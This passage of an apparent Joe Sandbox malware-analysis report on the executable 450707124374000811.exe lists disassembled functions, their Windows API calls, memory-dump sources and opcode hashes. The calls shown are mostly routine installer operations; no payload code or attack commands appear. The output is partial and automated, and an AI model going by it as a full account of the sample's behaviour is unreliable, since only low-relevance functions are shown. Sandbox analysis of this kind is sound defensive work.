                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: FreeGlobal
                                                              • String ID:
                                                              • API String ID: 2979337801-0
                                                              • Opcode ID: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                              • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                              • Opcode Fuzzy Hash: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                              • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                              Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                              • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                              • String ID:
                                                              • API String ID: 4216380887-0
                                                              • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                              • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                              • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                              • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                              Function 00401DB3 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401DB6
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                              • String ID:
                                                              • API String ID: 3808545654-0
                                                              • Opcode ID: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                              • Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
                                                              • Opcode Fuzzy Hash: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                              • Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D
                                                              Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                              • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                              • String ID:
                                                              • API String ID: 1148316912-0
                                                              • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                              • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                              • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                              • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                              Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                              • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                              • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                              • Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
                                                              • Opcode Fuzzy Hash: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                              • Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78
                                                              Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                              • Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
                                                              • Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                              • Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18
                                                              Function 00404AA2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                              • wsprintfW.USER32 ref: 00404B4C
                                                              • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s
                                                              • API String ID: 3540041739-3551169577
                                                              • Opcode ID: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                              • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                              • Opcode Fuzzy Hash: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                              • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                              Function 00405B53 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B75
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 2659869361-823278215
                                                              • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                              • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                              • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                              • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                              Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                              • GetTickCount.KERNEL32 ref: 00402E8E
                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                              • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                              • String ID:
                                                              • API String ID: 2102729457-0
                                                              • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                              • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                              • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                              • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                              Function 004038FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75923420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                              • GlobalFree.KERNEL32(?), ref: 0040391C
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Free$GlobalLibrary
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 1100898210-823278215
                                                              • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                              • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                              • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                              • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                              Function 00405B9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\450707124374000811.exe,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\450707124374000811.exe,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 2709904686-1246513382
                                                              • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                              • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                              • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                              • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                              Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                              • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                              • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                              • GlobalFree.KERNEL32(?), ref: 10001203
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                              • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                              • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                              • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                              Function 00405CD9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                              • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                              • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                              • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98

                                                              Execution Graph

                                                              Execution Coverage:0%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:100%
                                                              Total number of Nodes:1
                                                              Total number of Limit Nodes:0
                                                              execution_graph 82239 35982c70 LdrInitializeThunk

                                                              Executed Functions

                                                              Function 359835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2 359835c0-359835cc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e0d5c4ec7da17b26861603e37e4c8d3f67dcf5701b80f71c84a0b5c23d9b817a
                                                              • Instruction ID: a070307c7fa854fde1d6e6c7d786a35df58acb33b642cb8e00866dd79be03e9d
                                                              • Opcode Fuzzy Hash: e0d5c4ec7da17b26861603e37e4c8d3f67dcf5701b80f71c84a0b5c23d9b817a
                                                              • Instruction Fuzzy Hash: 1490023260660402D10471584518746101947D0201FA5C496A0428528D879A8A5565A7
                                                              Function 35982DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1 35982df0-35982dfc LdrInitializeThunk
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
